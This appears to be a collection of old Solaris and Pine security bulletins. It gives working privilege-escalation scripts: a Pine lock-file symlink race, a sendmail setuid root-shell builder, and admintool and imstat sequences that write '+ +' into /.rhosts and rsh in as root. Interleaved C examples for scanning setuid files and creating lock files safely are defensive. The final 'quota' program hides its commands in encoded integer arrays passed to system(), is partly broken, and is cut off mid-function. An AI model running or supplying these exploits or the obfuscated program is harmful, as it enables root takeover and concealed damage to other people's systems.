# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
# e-torres@uniandes.edu.co
#
argumentos=0
if [ $# -eq $argumentos ]
then
echo "Usage: $0 username path/file_to_create & "
echo "ET Lownoise 1996 Colombia"
exit
fi
username=$1
archivo=$2
#CHANGE THIS:
#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command
text='+ +'
usr=users
pineprog=pine
#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0
until [ $entro -eq $entrada ]
do
for nombre in `$usr`
do
if [ $nombre = $1 ]
then
entro=1
fi
done
done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "

noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do

for ejecutando in `w $username`


do
if [ $ejecutando = $pineprog ]
then
date
echo '- OK ' $1 ' is running ' $pineprog '.'
ejecuto=1
fi
done
done
echo "- Now lets grab the lock file of $username from /tmp"
ls -al /tmp | grep $username > temp1
cat temp1 | grep rw-rw-rw- > temporal
lockfile=`awk '{print $9}' temporal`
rm temp1
rm temporal
echo "> Username $username"
echo "> Lockfile $lockfile"
echo
echo "- OK now im going to wait that $username "
echo " quits $pineprog "
# do it till exist lockfile, that means username havent quit pine
cd /tmp
while [ -s $lockfile ]
do
sleep 0
done
cd
date
echo "- OK $username quit $pineprog .. now to link $lockfile "
#$archivo is the complete path of file in username
cd /tmp
# (one-line step elided by the author)
echo "- $lockfile is now linked "
cd
echo "- $username must now return to pine to create"
echo " $archivo "
echo "- Waiting $username to return pine "
noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do
for ejecutando in `w $username `
do
if [ $ejecutando = $pineprog ]
then
date
echo '- OK ' $username ' is running ' $pineprog
ejecuto=1
fi
done
done
echo "- Introducing text..."
cd /tmp
echo $text > $lockfile
echo "- Erasing $lockfile "
rm $lockfile
cd
echo "THE END DUDE!"
echo "ET Lownoise 1996 "

Solution
Upgrade Pine to version 3.95 or later.
---------------------------
Title: [Security] Solaris sendmail
Command
sendmail ( 8.7.x ~ 8.8.2?)
System
Solaris 2.5, 2.5.1
Problem
A bug in sendmail can be used to obtain a root shell.
The following is the example.
#!/bin/sh
#
# Modify RUN in x.c for what you wanna run, and possibly the
# location or format of the ps command in the KILL line below for
# your platform.
#
# Or you could remove x.c alltogether and just put what you wanna
# do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
#
#
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include <unistd.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
/* (a series of steps elided by the author ..) */
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Solution
Upgrading sendmail to version 8.8.5 or later fixes this.
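The script above finishes by testing whether /tmp/x ended up setuid; that artefact is also what a defender looks for afterwards. The following is an added C example, not part of the bulletin, that scans one directory for regular files carrying the setuid or setgid bit, the check an administrator would run over /tmp and /var/tmp after an incident like this. The mode classifier is separated from the directory walk so it can be checked against constructed modes; the default directory and the output format are choices made for this example.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if a regular file with this mode would run with elevated privilege. */
int is_privileged_mode(mode_t mode)
{
    return S_ISREG(mode) && (mode & (S_ISUID | S_ISGID)) ? 1 : 0;
}

/* Counts privileged regular files directly inside dir, printing each one.
 * Entries are examined with lstat, so a symlink planted in the directory
 * is neither followed nor reported as a hit. Returns -1 if dir cannot be
 * opened. */
int scan_setuid(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *ent;
    struct stat st;
    char path[PATH_MAX];
    int hits = 0;

    if (d == NULL)
        return -1;
    while ((ent = readdir(d)) != NULL) {
        if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, ent->d_name);
        if (lstat(path, &st) == -1)
            continue;
        if (is_privileged_mode(st.st_mode)) {
            printf("%s: uid %u mode %04o\n", path,
                   (unsigned)st.st_uid, (unsigned)(st.st_mode & 07777));
            hits++;
        }
    }
    closedir(d);
    return hits;
}

int main(int argc, char *argv[])
{
    const char *dir = argc > 1 ? argv[1] : "/tmp";   /* default chosen for the example */
    int hits = scan_setuid(dir);

    if (hits < 0) {
        perror(dir);
        return 1;
    }
    printf("%d privileged file(s) under %s\n", hits, dir);
    return hits > 0 ? 2 : 0;
}
```

Run it from cron against every world-writable directory; a non-zero exit on any hit makes it easy to alert on, and mounting those directories nosuid removes the class of artefact entirely.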
---------------------------
Title: [Security] Solaris admintool
Command
admintool
System
Solaris 2.5
Problem
Through the following simple sequence, a .rhosts file can be created and root obtained.
setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
# (a series of steps elided by the author)
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"
Solution
Remove the setuid bit or apply the patch.
---------------------------
Title: [Security] Solaris imstat (license manager)
Command
imstat (license manager)
System
Solaris 2.4
Problem
It creates a temporary file in /var/tmp.. by linking that name to .rhosts, the .rhosts file can be created.
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
# (a series of steps elided by the author)

Solution
Tighten the permissions.
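The Pine, admintool and imstat entries above are the same bug shape: a privileged program creates or truncates a predictable file under /tmp or /var/tmp, and a symlink planted at that name redirects the write into .rhosts. As an added example, not code from the bulletin or from any of those programs, the C below shows the defensive pattern and exercises it in a scratch directory: create with O_CREAT|O_EXCL|O_NOFOLLOW so an existing name (symlink or stale lock) is refused rather than truncated, and verify after opening that the descriptor is a regular file with one link owned by the caller. The scratch directory name, the lock-file names and the "victim" file are constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns an open descriptor on a freshly created lock file, or -1 when the
 * path already exists (a planted symlink or a stale lock), is not a regular
 * file, has more than one hard link, or is not owned by the caller. */
int safe_create_lock(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);

    if (fd == -1)
        return -1;                 /* EEXIST covers both a symlink and a race */
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

/* 1 if path is a symbolic link (what an administrator would look for at a
 * lock-file name in /tmp), 0 if not, -1 on error. */
int is_symlink(const char *path)
{
    struct stat st;
    if (lstat(path, &st) == -1)
        return -1;
    return S_ISLNK(st.st_mode) ? 1 : 0;
}

/* Plays out the shape of the entries above in a scratch directory: a symlink
 * at the lock-file name pointing at a "victim" file must be refused, and a
 * fresh name must succeed exactly once. Returns 0 when every step behaves as
 * expected, otherwise a small code identifying the failing step. */
int scenario(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX";   /* constructed scratch directory */
    char victim[64], lock[64], fresh[64];
    int fd, rc = 0;

    if (mkdtemp(dir) == NULL)
        return 1;
    snprintf(victim, sizeof victim, "%s/victim", dir);      /* stands in for /.rhosts */
    snprintf(lock,   sizeof lock,   "%s/.group.lock", dir); /* the planted name */
    snprintf(fresh,  sizeof fresh,  "%s/.fresh.lock", dir);

    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd == -1 || close(fd) == -1 || symlink(victim, lock) == -1)
        return 2;

    if (is_symlink(lock) != 1)                      rc = 3;
    else if (safe_create_lock(lock) != -1)          rc = 4;   /* must not follow the link */
    else if ((fd = safe_create_lock(fresh)) == -1)  rc = 5;   /* clean name succeeds */
    else {
        close(fd);
        if (safe_create_lock(fresh) != -1)          rc = 6;   /* second create is refused */
    }

    unlink(lock); unlink(victim); unlink(fresh); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = scenario();
    printf("lock-file scenario: %s (code %d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc;
}
```

A program that must reuse a lock name across runs should remove the stale file with unlink and recreate it this way, never open it with O_TRUNC; a sticky-bit /tmp (which Solaris and Linux both support) additionally stops other users deleting the real lock to make room for their link.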
---------------------------
Title: [Security] Solaris quota
Command
quota
System
Solaris 2.5 (.1 ??)
Problem
Files can be created while evading quota limits.
Here is the example.

/**************************************************************************
* This exploit takes advantage of the latest sendmail hole, to hide *
* warez from your quota program, effectivly making your quota infinate.. *
* *
* To compile: *
* cc -o bigquota quota.c *
* To run: *
* ./bigquota file *
* where file is the file you wish to hide from your quota program. *
* *
* Please note that this may take a minute. *
* If you have any problems, talk to me, TSK, on IRC. *
**************************************************************************/
#include
#include
#include
#include
#include
int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
115,85,38,30,122,126,3,93,97,44,100,32,33,10};
void main(argc, argv)
int argc;
char *argv[];
{
char *checkseed(int *seeds);
char *checkdir(char *dir);
int initseeds[201]={25,\
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
int setupseeds[201]={1,\
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
67,-10,-79,96,23,4,3,-68,84,64,89};
int binseeds[201]={1,\
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
89,-7,-11,94,19,-65,72,-3,67,79,111};
int procseeds[201]={-14,\
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
85,-11,-22,111,-47,-65,60,-1,85,78,106};
int boutseeds[201]={-14842,\
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
32,-72,-94,40,-61,-54,-12,11,72,66,91};
int shtdwnseeds[201]={-42,\
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
16,-90,-78,45,-38,-65,56,11,77,71,89};
char *zipper(int *seeds1);
char *path;
int i=0,j,inhan,outhan;
if(argc!=2)
{
puts("Usage:");
puts("quota ");
puts("where is the file you wish");
puts("to hide/subtract from your quota.");
exit(0);
}
system(zipper(initseeds));
system(zipper(setupseeds));
system(checkseed(binseeds));
path=checkdir("/");
if(!path)
{
puts("Technical Dificulties");
goto closeout;
}
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
{
puts("Error opening outfile");
goto closeout;
}
if((inhan=open(argv[1],O_RDONLY))==-1)
{
puts("Error opening infile");
goto closeout;
}
if(filecopy(inhan,outhan))
{
puts("Technical dificulties");
goto closeout;
}
if((unlink(argv[1]))==-1)
{
puts("Technical dificulties.");
goto closeout;
}
if((rename(path,argv[1]))==-1)
if((link(path,argv[1]))==-1)
if((symlink(path,argv[1]))==-1)
puts("Technical Dificulties.");
closeout:
system("%s\n",zipper(procseeds));
system("%s\n",zipper(boutseeds));
system("%s\n",zipper(shtdwnseeds));
}
char *checkseed(int *seeds)
{
char *zipper(int *seeds1);
char *string;
char testseeds[30];
char god[200];
int i=200,j;
if((string=(char *)getenv("PATH"))==NULL)
{
puts("Path not found");
exit(-1);
}
while((seeds[i]+seedsc[i])!=32)
{
testseeds[200-i]=seeds[i]+seedsc[i];
i--;
}
testseeds[i]=0;
i=0;
while(string[i]!=0)
{
j=0;
while(string[i]!=58&&string[i]!=0)
{
god[j]=string[i];
i++;
j++;
}
i++;
god[j++]=47;
god[j++]=0;
strcpy(&god[j],testseeds);
if(!stat(god,NULL))
return (char *)zipper(seeds);
}
return 0;
}
char *zipper(int *seeds1)
{
int i;
char *buhbye;
char teeth[201];
teeth[201]=0;
for(i=200;i>=0;i--)
teeth[200-i]=seeds1[i]+seedsc[i];
buhbye=(char *)malloc(201);
strcpy(buhbye,teeth);
return buhbye;
}
int filecopy(int from,int to)
{
int bufsiz;
if (from < 0)
return 1;
if (to < 0)
goto err;
for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1)
{
register char *buffer;
buffer = (char *) malloc(bufsiz);
if (buffer)
{
while (1)
{
register int n;
n = read(from,buffer,bufsiz);
if (n == -1)
break;
if (n == 0)
{
free(buffer);
return 0;
}
if (n != write(to,buffer,(unsigned) n))
break;
}
free(buffer);
break;
}
}
err:
return 1;
}
char *checkdir(char *dir)
{
char *checkdir(char *dir);
DIR *currdir;
struct dirent *node;
struct stat statnode;
int i,j;
char *path;
char *retpath;
path=(char *)malloc(300);
if((currdir=opendir(dir))==NULL)
return 0;
node=readdir(currdir);
while(node)
{
i=0;
j=0;
while(dir[i])
{
path[i]=dir[i];
i++;
}
if(strcmp(dir,"/"))
{
path[i]='/';
i++;
}
while(node->d_name[j])
{
path[i]=node->d_name[j];
i++;
j++;
}
path[i]=0;
if((lstat(path,&statnode))==-1)
return 0;
if(statnode.st_mode&S_IFREG)
if(!access(path,W_OK))
if(!(statnode.st_mode&S_IFBLK))
if(!(statnode.st_mode&S_ISVTX))
if(statnode.st_uid!=getuid())
return path;
if(statnode.st_mode&S_IFDIR)
